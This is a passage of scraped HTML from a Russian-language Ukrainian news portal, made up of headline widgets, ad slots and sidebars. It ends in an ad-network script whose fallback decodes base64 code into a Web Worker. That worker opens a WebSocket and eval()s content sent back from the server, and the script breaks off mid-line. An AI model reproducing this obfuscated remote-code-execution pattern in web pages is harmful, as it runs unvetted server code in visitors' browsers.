id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1609-v-kieve-desyatki-avto-oblili-kislotoj-video"><img width="142" height="88" alt="В Киеве десятки авто облили кислотой" src="https://enovosty.com/wp-content/uploads/2019/09/2019-09-16-11.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1609-v-kieve-desyatki-avto-oblili-kislotoj-video">В Киеве десятки авто облили кислотой</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_technology/full/1109-kitaj-opublikoval-video-pokazyvayushhee-srazu-sem-novejshix-istrebitelej-j-20-v-vozduxe-video"><img width="142" height="88" alt="Китай опубликовал видео, показывающее сразу семь новейших истребителей J-20 в воздухе" src="https://enovosty.com/wp-content/uploads/2019/09/2-6-e1568193787685.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_technology/full/1109-kitaj-opublikoval-video-pokazyvayushhee-srazu-sem-novejshix-istrebitelej-j-20-v-vozduxe-video">Китай опубликовал видео, показывающее сразу семь новейших истребителей J-20 в воздухе</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1509-poltora-milliona-prosmotrov-za-10-dnej-video-s-razgovarivayushhimi-popugayami-stalo-virusnym-v-seti-video"><img width="142" height="88" alt="Полтора миллиона просмотров за 10 дней: видео с разговаривающими попугаями стало вирусным в Сети" src="https://enovosty.com/wp-content/uploads/2019/09/maxresdefault-3-e1568529124499.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1509-poltora-milliona-prosmotrov-za-10-dnej-video-s-razgovarivayushhimi-popugayami-stalo-virusnym-v-seti-video">Полтора миллиона просмотров за 10 дней: видео с разговаривающими попугаями стало вирусным в Сети</a></div></td></tr><tr><td class="view"><span><i></i>5551</span></td><td class="view"><span><i></i>4718</span></td><td class="view last"><span><i></i>3874</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video"><img width="142" height="88" alt="В Сети показали обновленный “мост Кличко” в Киеве" src="https://enovosty.com/wp-content/uploads/2019/09/89-e1568714801409.jpeg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video">В Сети показали обновленный “мост Кличко” в Киеве</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_kiev/full/1209-za-skot-prinimayut-zhiteli-stolicy-zablokirovali-gorodskuyu-elektrichku-video"><img width="142" height="88" alt="За скот принимают: Жители столицы заблокировали городскую электричку" src="https://enovosty.com/wp-content/uploads/2019/09/5d79ebe1d8a04.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_kiev/full/1209-za-skot-prinimayut-zhiteli-stolicy-zablokirovali-gorodskuyu-elektrichku-video">За скот принимают: Жители столицы заблокировали городскую электричку</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/proishestviya-video/full/1209-nakanune-xarkovprajda-oblili-zelenkoj-olesya-doniya"><img width="142" height="88" alt="Накануне ХарьковПрайда Олеся Дония облили зеленкой" src="https://enovosty.com/wp-content/uploads/2019/09/1568306698-4060.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/proishestviya-video/full/1209-nakanune-xarkovprajda-oblili-zelenkoj-olesya-doniya">Накануне ХарьковПрайда Олеся Дония облили зеленкой</a></div></td></tr><tr><td class="view"><span><i></i>3566</span></td><td class="view"><span><i></i>3109</span></td><td class="view last"><span><i></i>2980</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_economy/full/1009-vremeni-malo-ekspert-predupredil-kakie-dengi-skoro-perestanut-prinimat" rel="bookmark">Времени мало: Эксперт предупредил, какие деньги скоро перестанут принимать</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/709-advokat-zayavil-o-tom-chto-dolgozhdanny-obmen-delo-neskolkix-chasov" rel="bookmark">Адвокат заявил о том, что долгожданны “обмен - дело нескольких часов”</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1908-ozvuchen-ochen-trevozhnyj-prognoz-po-otnosheniyam-ukrainy-s-evrosoyuzom" rel="bookmark">Озвучен очень тревожный прогноз по отношениям Украины с Евросоюзом</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/1607-obezglavlennye-posolstva-stalo-izvestno-pochemu-smenili-12-poslov" rel="bookmark">Обезглавленные посольства: Стало известно, почему сменили 12 послов</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/407-poslom-saudovskoj-aravii-vpervye-stala-zhenshhina" rel="bookmark">Послом Саудовской Аравии впервые стала женщина</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1104-litva-otozvala-posla-iz-rossii" rel="bookmark">Литва отозвала посла из России</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/802-takogo-ne-bylo-s-okonchaniya-vtoroj-mirovoj-vojny-v-evrope-vspyxnul-gromkij-skandal" rel="bookmark">"Такого не было с окончания Второй мировой войны": В Европе вспыхнул громкий скандал</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_technology/full/410-novaya-sistema-obmena-dannymi-unichtozhit-internet" rel="bookmark">Новая система обмена данными уничтожит интернет</a><br /></td> </tr><tr></tr></table></div> <div id="M417238ScriptRootC689974" onclick="trackOutboundLink(this, 'IdealMedia', 'idealmedia.io');"><div id="M417238PreloadC689974"> Загрузка... </div></div><script> (function () { var script = document.createElement('script');script.src = "//jsc.idealmedia.io/e/n/enovosty.com.689974.js?t=" + ((d = new Date()) ? '' + d.getYear() + d.getMonth() + d.getUTCDate() + d.getUTCHours() : '');
script.async = true; document.body.appendChild(script); })();</script> <script>jQuery(document).ready(function($){function region(){html = $('#lastafishasingle .anythingWindow .activePage .region').html();$('#lastafishasingle .head span').html(html);}$('#sliderafishasingle').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><style>#sliderafishasingle .tact li{float:left;width:220px;line-height:8px}#lastafishasingle div.anythingSlider-minimalist-round{margin:auto}#lastafishasingle .postafisha{width:224px}#lastafishasingle h2{text-align:left;padding:10px 32px 10px 35px}#lastafishasingle .title a{display:block;font-size:13px;font-weight:700;text-align:left}#lastafishasingle{margin-bottom:10px;padding:0}#lastafishasingle .title{padding:5px 35px 5px 25px}#lastafishasingle.slide div.anythingSlider-minimalist-round .back,#lastafishasingle.slide div.anythingSlider-minimalist-round .forward{width:40px;height:132px;opacity:1;background-color:transparent}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("img/slider-arrows1.png") no-repeat;width:20px;height:45px;margin-top:54px;margin-left:10px}#lastafishasingle{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha5.png") repeat;border:1px solid #daa36b;-moz-background-size:100%; -webkit-background-size:100%; -o-background-size:100%; background-size:100%}#lastafishasingle .anythingSlider{border-bottom:1px solid #a99168}#lastafishasingle.slide div.anythingSlider-minimalist-round .arrow a{background:url("https://enovosty.com/wp-content/themes/eizvestia/img/afisha_arrows3.png") no-repeat}#lastafishasingle.slide div.anythingSlider-minimalist-round .forward a{background-position:right 0;margin-left:18px}#lastafishasingle .allafisha{display:block;text-align:right;font-size:14px;font-weight:bold;margin:0;padding:6px 10px 6px}#lastafishasingle .postafisha{position:relative}#lastafishasingle h2 span{float:right;font-size:11px;line-height:18px}#lastafishasingle .region{font-size:13px;text-align:left;padding:0 25px 5px}#lastafishasingle.slide.ssingle h2{padding:10px 17px 3px 40px;font-size:17px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .back,#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward{width:27px;right:-5px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .arrow a{margin-left:0px}#lastafishasingle.slide.ssingle div.anythingSlider-minimalist-round .forward a{margin-left:7px}#lastafishasingle.slide.ssingle .postafisha{width:220px;text-align:right}#lastafishasingle.slide.ssingle .postafisha .aimg{text-align:center;overflow:visible}#lastafishasingle.slide.ssingle .postafisha .aimg img{overflow:visible;box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-moz-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-webkit-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-ms-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-o-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5);-khtml-box-shadow:0.4em 0.4em 2px rgba(122,122,122,0.5)}</style><div id="lastafishasingle" class="slide ssingle"><p class="head">Афиша</p><ul id="sliderafishasingle"><li><ul class="tact"><li><ul class="tact"><li ><div id="post-4771985" class="postafisha"><span class="region">Киев 19&#160;сентября</span><div class="aimg"><a href="https://enovosty.com/kino/full/909-kinopremera-film-fokster-i-maks"><img width="170" height="132" alt="Кинопремьера: фильм «Фокстер і Макс»" src="/wp-content/uploads/2019/09/poster.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/909-kinopremera-film-fokster-i-maks">Кинопремьера: фильм «Фокстер і Макс»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4772000" class="postafisha"><span class="region">Киев 19&#160;сентября</span><div class="aimg"><a href="https://enovosty.com/kino/full/909-kinopremera-film-k-zvyozdam"><img width="170" height="132" alt="Кинопремьера: фильм «К звёздам»" src="/wp-content/uploads/2019/09/zvezdam.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/909-kinopremera-film-k-zvyozdam">Кинопремьера: фильм «К звёздам»</a></div></div></li></ul></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4375507"><a href="https://enovosty.com/armiya/full/783-samolet-mcdonnell-douglas-f-15e-strike-eagle-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/07/McDonnell-Douglas-F-15E-Strike-Eagle-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/McDonnell-Douglas-F-15E-Strike-Eagle-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/07/McDonnell-Douglas-F-15E-Strike-Eagle-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/McDonnell-Douglas-F-15E-Strike-Eagle.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/783-samolet-mcdonnell-douglas-f-15e-strike-eagle-ssha" >Самолет McDonnell Douglas F-15E Strike Eagle (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4382064"><a href="https://enovosty.com/armiya/full/852-samohodnaya-gaubica-155-mm-m109-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/m109-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/m109-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/m109-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/m109.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/852-samohodnaya-gaubica-155-mm-m109-ssha" >Самоходная гаубица 155-мм М109 (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4405379"><a href="https://enovosty.com/armiya/full/476-boevaya-mashina-pehoty-strf-90-shveciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/strf_90_edit-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/strf_90_edit-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/strf_90_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/strf_90_edit.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/476-boevaya-mashina-pehoty-strf-90-shveciya" >Боевая машина пехоты Strf 90 (Швеция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4419794"><a href="https://enovosty.com/armiya/full/556-bespilotnyj-letatelnyj-apparat-elbit-hermes-900-izrail" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/01/Elbit_Hermes_900-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/01/Elbit_Hermes_900-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/01/Elbit_Hermes_900-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/01/Elbit_Hermes_900.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/556-bespilotnyj-letatelnyj-apparat-elbit-hermes-900-izrail" >Беспилотный летательный аппарат Elbit Hermes 900 (Израиль)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости мира</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4244,8', 4244, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4244,8', 4244, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4244,8', 4244, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_abroad/full/1309-pochemu-slabeet-putin-i-ego-partiya-inosmi">Почему слабеет Путин и его партия, - ИноСМИ (4429)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1309-armiya-ssha-provela-ispytaniya-novejshej-minometnoj-sistemy-nemo">Армия США провела испытания новейшей минометной системы Nemo (ФОТО) (4017)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1509-poltora-milliona-prosmotrov-za-10-dnej-video-s-razgovarivayushhimi-popugayami-stalo-virusnym-v-seti-video">Полтора миллиона просмотров за 10 дней: видео с разговаривающими попугаями стало вирусным в Сети (ВИДЕО) (3876)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1209-cemax-vozvrashhaetsya-v-ukrainu-posle-obmena-nazvali-prichinu">Цемах возвращается в Украину после обмена: назвали причину (3451)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1209-rejting-upal-v-tri-raza-kavkaz-otvorachivaetsya-ot-putina">Рейтинг упал в три раза: Кавказ отворачивается от Путина (2852)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1609-putin-nachinaet-voennye-ucheniya-s-uchastiem-6-stran">Путин начинает военные учения с участием 6 стран (2785)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1109-v-rf-neozhidanno-vypal-sneg-video">В РФ неожиданно выпал снег (ВИДЕО) (2693)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1609-armiya-ssha-provela-udachnye-ispytaniya-perenosnoj-sistemy-unichtozheniya-bespilotnikov-blade">Армия США провела удачные испытания переносной системы уничтожения беспилотников (2644)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1609-ceny-na-neft-vzleteli-so-skorostyu-zvuka">Цены на нефть взлетели со "скоростью звука" (2640)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/1609-v-ssha-podnimaetsya-cunami-kotoroe-smoet-putina">В США поднимается цунами, которое смоет Путина (2515)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301907"><a href="https://enovosty.com/person/full/klichko-vladimir" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/klichko_vladimir.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/klichko-vladimir" >Владимир<br /> КЛИЧКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4326453"><a href="https://enovosty.com/person/full/butkevich-gennadij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/11/butkevich_gennadiy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/11/butkevich_gennadiy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/11/butkevich_gennadiy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/butkevich-gennadij" >Геннадий<br /> БУТКЕВИЧ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4328352"><a href="https://enovosty.com/person/full/221-hmelnickij-vasilij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/vasiliy-hmelnitskiy_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/vasiliy-hmelnitskiy_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/vasiliy-hmelnitskiy_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/221-hmelnickij-vasilij" >Василий<br /> ХМЕЛЬНИЦКИЙ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4332259"><a href="https://enovosty.com/person/full/813-kolesnichenko-vadim" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/12/kolesnichenko_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/12/kolesnichenko_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/12/kolesnichenko_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/813-kolesnichenko-vadim" >Вадим<br /> КОЛЕСНИЧЕНКО</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_kiev/full/1709-v-seti-pokazali-obnovlennyj-most-klichko-v-kieve-video">В Сети показали обновленный “мост Кличко” в Киеве (ВИДЕО) (3566)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1709-donbass-umiraet-zhurnalist-povedal-o-sereznyx-problemax-u-boevikov-dnr-lnr">Донбасс умирает: Журналист поведал о серьезных проблемах у боевиков ДНР-ЛНР (3327)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1709-%e2%80%8bv-centre-virusologii-v-rossii-gde-xranyatsya-virusy-ebola-i-ospy-proizoshel-vzryv">​В центре вирусологии в России, где хранятся вирусы Эбола и оспы, произошел взрыв (2089)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/1709-eksperty-rasskazali-skolko-i-za-kakie-nomernye-znaki-dlya-avto-nado-platit">Эксперты рассказали, сколько и за какие номерные знаки для авто надо платить (2062)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1709-polzovateli-viber-skoro-smogut-poradovatsya-novoj-kreativnoj-funkcii">Пользователи Viber скоро смогут порадоваться новой креативной функции (2047)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1709-vozle-kieva-sozhgli-dom-gontarevoj">Возле Киева сожгли дом Гонтаревой (1998)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/1709-ssha-sozdadut-istrebiteli-novogo-pokoleniya">США создадут истребители нового поколения (1949)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/1709-ukrainskie-voennye-ubili-trex-boevikov-i-zaxvatili-ix-pulemetchika">Украинские военные убили трех боевиков и захватили их пулеметчика (1724)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1709-v-ssha-uspeshno-integrirovali-istrebiteli-a-35-s-samoletami-shpionami-u-2-dlya-perexvata-ballisticheskix-raket">В США успешно интегрировали истребитель F-35 с самолетом-шпионом U-2 для перехвата баллистических ракет (1510)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/1709-britanskij-bank-otkazal-v-dengax-rossijskomu-oligarxu">Британский банк отказал в деньгах российскому олигарху (1504)</a></p></div> </div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><br /></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div id="adriver_banner_C3"></div><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1609-sergej-kaftya-segodnya-v-akvarelyax-komfortnee-zhit-chem-v-bolshinstve-zhk-kieva">Сергей Кафтя: «Сегодня в «Акварелях» комфортнее жить, чем в большинстве ЖК Киева»</a></p><p class="press"><a href="https://enovosty.com/publications/full/2308-kak-programmy-es-i-ebrr-pomogli-proizvoditelyam-mebeli-v-brovarax">Как программы ЕС и ЕБРР помогли производителям мебели в Броварах</a></p></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/1109-chto-sprovociruet-mirovoj-krizis-v-2020-godu"><img alt="Что спровоцирует мировой кризис в 2020 году" src="https://enovosty.com/wp-content/uploads/2019/09/image-2-112x87.jpg"><div></div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/1109-chto-sprovociruet-mirovoj-krizis-v-2020-godu">Что спровоцирует мировой кризис в 2020 году</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/1109-chto-sprovociruet-mirovoj-krizis-v-2020-godu">К 2020 году три негативных шока могут спровоцировать глобальную рецессию. Все они объясняются политическими факторами, влияющими на международные отношения. ...</a></span></div></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div id='go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570');});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/novosti-kompanij">Новости компаний</a></div></div> <p class="press"><a href="https://enovosty.com/novosti-kompanij/full/1406-novostrojki-v-brovarax-kvartal-allej-odin-iz-samyx-perspektivnyx-i-masshtabnyx-proektov-vo-vsej-kievskoj-oblasti">Новостройки в Броварах «Квартал Аллей» — один из самых перспективных и масштабных проектов во всей Киевской области</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/3005-osobennosti-bojlerov-atlantik">Особенности бойлеров Атлантик</a></p><p class="press"><a href="https://enovosty.com/novosti-kompanij/full/2005-kriterii-vybora-xolodilnika">Критерии выбора холодильника</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
